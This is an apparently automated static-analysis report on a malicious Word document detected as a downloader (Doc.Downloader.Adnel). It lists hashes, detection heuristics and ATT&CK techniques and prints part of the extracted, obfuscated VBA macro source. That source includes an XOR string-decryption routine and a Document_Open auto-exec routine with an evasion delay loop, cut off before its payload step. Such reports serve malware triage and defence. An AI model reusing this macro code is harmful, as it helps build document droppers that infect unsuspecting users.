Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd514bd71718b746…

MALICIOUS

Office (OLE)

275.0 KB Created: 2015-12-09 11:47:00 Authoring application: Microsoft Office Word First seen: 2017-11-20
MD5: 134a0812f799110fe38aa24b7ca5987e SHA-1: 3096fb4c5d1d72f7b6d12a0bfb9426b922305ec3 SHA-256: fd514bd71718b746c02d41f4b8bcc23987f629460214b0647ca76c76096dacb8
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the Document_Open macro attempts to execute arbitrary code using the Shell() function. This is a common technique for downloading and executing further malicious content, as suggested by the ClamAV detection name 'Doc.Downloader.Adnel-6923089-0'.

Heuristics 8

  • ClamAV: Doc.Downloader.Adnel-6923089-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Adnel-6923089-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36964 bytes
SHA-256: bab97032f27679ec7a2d4b36e936f6644ef19f3ae04eecb42f63380c1178f5e8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function JykTJQD4G2cOy8 Lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC" (ByVal YgAUarPfLxPdtCA As String, HTZKc23cQRC As Long) As Long
#Else
Private Declare Function JykTJQD4G2cOy8 lib "CUg11kLP1XpZ" Alias "AzG6JC1HkOC"(byval YgAUarPfLxPdtCA as String, HTZKc23cQRC as Long ) as Long
#End If
Sub LJvPzGuIEvbDez()
UKAYbwDZ57 = 12
PrjeFdHhj = 33 + 22 + 57 + 51
Beep
Err.Raise 11
Reset
Loc 36
GetObject 12, 85
If CDate(38) = True Then Nvyk5q05hN = 8078
HRmRG960xOhdF = CVErr(33)
DateAdd "R05hNTOz", 96, 31
BHfgxvQe0CWo = CVar(4)
HjMXrEGB7EIG = Day(12)
CallByName VOnl0L8H, 61, VbMethod, 12, 33, 22
Mr7DgjGS2s = UCase(57)
If CBool(51) = True Then SDwIEM9hCP9 = 94
Stop
WeekdayName 37
Weekday 84
LOzjsXjIJ0v6vo = Cos(10)
XE17KKuzTHoL = CVDate(69)
DatePart "NJ32Vn746", 61
ChDrive 83
LoadPicture 17, 45, 86, 62, 80
RgTjI5wZBmKNXtLZ = LCase(26)
Rate 16, 72, 76
FV 39, 77, 88
If CDec(4) = True Then V6Xugu2ek = 83
Command
IsDate 44
If CDbl(61) = True Then JyjarAm1V7y = 63
H16qDwlagaUNgmZ = CSng(59)
Load A00gFR6ds
MPi7q2sOqHMpNK = 51
REjVIp2fr3z1 = 41 + 97 + 28 + 63
End Sub
Function IXBQ8rXi7(ByVal AKCwkL As String, UmeZOQvT9 As String) As String
NcHt1P34 = 25
RDouSkfS = 73 + 73 + 26 + 42
On Error Resume Next
OFbMl1X7VZm5qH = 87
LlXCOfqQ1qOwG = 56 + 77 + 88 + 81
Dim ElmivNz() As Byte, L56ObCqtgE(0 To 285) As Integer, Comk() As Byte, BGqsIjn9Ar4W7tbNS, YSR3FY6aQILHBXlvq, FbuWg95k2F, B9JLDUu6bU8, V4EY3 As Boolean
Qqw9XZOphom = 71
Yuzaf = 80 + 7 + 27 + 67
ElmivNz = StrConv(AKCwkL, (64 + 1 + 64 - 1))
KjgW8N2pMAUPTc60c = 74
Fi2nVr35ba = 70 + 36 + 14 + 53
Comk() = StrConv(UmeZOQvT9, (64 + 4 + 64 - 4))
H49TBhCiIG = 25
WcZih9dmDTN = 43 + 88 + 78 + 35
YSR3FY6aQILHBXlvq = UBound(Comk)
RWo3yOnFmn = 17
IXSlOjD00MfNG = 48 + 28 + 34 + 18
For BGqsIjn9Ar4W7tbNS = 0 To (127.5 + 5 + 127.5 - 5)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS
Next BGqsIjn9Ar4W7tbNS
For BGqsIjn9Ar4W7tbNS = (128 + 8 + 128 - 8) To (142.5 + 8 + 142.5 - 8)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS) = BGqsIjn9Ar4W7tbNS Xor (128 + 2 + 128 - 2)
Next BGqsIjn9Ar4W7tbNS
For BGqsIjn9Ar4W7tbNS = 1 To (3 + 6 + 3 - 6)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS + (124.5 + 1 + 124.5 - 1)) = Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS)
L56ObCqtgE(BGqsIjn9Ar4W7tbNS - 1) = Comk(BGqsIjn9Ar4W7tbNS - 1) Xor ((127.5 + 2 + 127.5 - 2) - Comk(YSR3FY6aQILHBXlvq - BGqsIjn9Ar4W7tbNS))
Next BGqsIjn9Ar4W7tbNS
V4EY3 = False
FbuWg95k2F = 0
B9JLDUu6bU8 = 0
For BGqsIjn9Ar4W7tbNS = 0 To UBound(ElmivNz)
If FbuWg95k2F > YSR3FY6aQILHBXlvq Then FbuWg95k2F = 0
If B9JLDUu6bU8 > (142.5 + 1 + 142.5 - 1) And V4EY3 = False Then B9JLDUu6bU8 = 0: V4EY3 = Not (V4EY3)
If B9JLDUu6bU8 > (142.5 + 4 + 142.5 - 4) And V4EY3 = True Then B9JLDUu6bU8 = (2.5 + 4 + 2.5 - 4): V4EY3 = Not (V4EY3)
ElmivNz(BGqsIjn9Ar4W7tbNS) = (ElmivNz(BGqsIjn9Ar4W7tbNS) Xor (L56ObCqtgE(B9JLDUu6bU8) Xor Comk(FbuWg95k2F)))
FbuWg95k2F = FbuWg95k2F + 1
B9JLDUu6bU8 = B9JLDUu6bU8 + 1
Next BGqsIjn9Ar4W7tbNS
BQ4X3YQb = 76
MdRZAL849TBhCi = 17 + 20 + 38 + 57
IXBQ8rXi7 = StrConv(ElmivNz(), (32 + 2 + 32 - 2))
Kl1fA = 37
IHiTDNOmV2vm = 8 + 21 + 35 + 66
End Function
Sub Document_Open()
NPUHgDq39g = 67
JzkEVf900xBR = 41 + 48 + 98 + 75
On Error Resume Next
HHsvV0SAXpLopC = 21
Lnnl8ewgIOG = 60 + 16 + 24 + 51
Dim BljIJUx8I5 As Long, MnDhCIs6Wf1q7p As Long, QJ9YpQevhGn As Long, P1ZZ6WLZ As Long
COpZ3hWr = 44
TqA1UeOSaVDnPEjUftu = 39 + 27 + 62 + 56
BljIJUx8I5 = 97673669: MnDhCIs6Wf1q7p = 0: QJ9YpQevhGn = 0
AioxM21uwTiOWQmiN = 97
NTpNi = 4 + 87 + 35 + 64
For MnDhCIs6Wf1q7p = 1 To BljIJUx8I5
QJ9YpQevhGn = QJ9YpQevhGn + 1
Next MnDhCIs6Wf1q7p
WcxI7EcvaPM8AQKU = 58
GzIxmaFC0aQj1 = 69 + 62 + 84 + 17
If QJ9YpQevhGn = BljIJUx8I5 Then
FL72KDOpvBzTBo5O2 = 55
UYzd0ANInn = 4 + 59 + 19 + 87
Dim RCyBgh8j5qV 
... (truncated)